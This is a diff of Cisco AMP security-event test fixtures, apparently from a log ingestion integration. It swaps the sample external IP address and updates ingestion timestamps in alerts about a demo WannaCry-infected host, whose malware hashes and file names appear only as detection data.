"action": "Quarantine Failure", @@ -1419,7 +1419,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1464,7 +1464,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1474,8 +1474,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025245294Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763869300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1495,7 +1495,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1540,7 +1540,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1550,8 +1550,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025247539Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763875400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1571,7 +1571,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1616,7 +1616,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1626,8 +1626,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025249744Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763882300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1647,7 +1647,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1692,7 +1692,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1702,8 +1702,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025251965Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763886500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1723,7 +1723,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1768,7 +1768,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1778,8 +1778,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025254167Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763891900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1799,7 +1799,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1844,7 +1844,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1854,8 +1854,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025256572Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763897100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1875,7 +1875,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1920,7 +1920,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1930,8 +1930,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025258876Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763903200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -1951,7 +1951,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1996,7 +1996,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2006,8 +2006,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025261148Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763909300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2027,7 +2027,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2084,7 +2084,7 @@ "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2101,8 +2101,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025263398Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"